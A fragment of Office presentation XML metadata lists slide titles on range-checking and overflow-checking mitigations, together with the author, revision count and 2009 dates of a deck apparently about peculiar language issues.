      <vt:lpstr>Mitigations: Range-Checking</vt:lpstr>
      <vt:lpstr>Mitigations: Range-Checking</vt:lpstr>
      <vt:lpstr>Mitigations: Range-Checking</vt:lpstr>
      <vt:lpstr>Mitigations: Overflow checking </vt:lpstr>
      <vt:lpstr>Mitigations: Overflow checking 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Peculiar language issues</dc:title>
  <dc:creator>ilja</dc:creator>
  <cp:lastModifiedBy>ilja</cp:lastModifiedBy>
  <cp:revision>186</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-03-30T04:11:57Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2009-10-30T09:28:07Z</dcterms:modified>
</cp:coreProperties>
</file>